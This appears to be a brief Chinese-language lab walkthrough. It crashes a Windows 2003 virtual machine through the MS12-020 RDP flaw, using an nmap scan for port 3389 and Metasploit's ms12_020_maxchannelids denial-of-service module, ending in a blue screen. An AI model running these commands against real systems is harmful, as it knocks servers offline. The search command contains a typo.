测试环境

攻击机:Kali-Linux2虚拟机
靶机:windows2003虚拟机
利用漏洞:ms12 -020 漏洞
ps:(微软关于MS12-020漏洞的安全公告: http://technet.microsoft.com/zhcn/security/bulletin/ms12-020 )

准备工作

  1. 靶机开启远程桌面服务
    右键–>我的电脑–>属性
  2. Kali使用nmap进行网段扫描。查看是否有主机开启3389端口

    nmap -p 3389 [ip地址/24]

metasploit的使用

  1. 打开控制台

    msfconsole

  1. 漏洞查找

    search m12-020

0

  1. use 漏洞+建立连接
  • use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
  • set rhost 192.168.21.158
  • run–>蓝屏
    蓝屏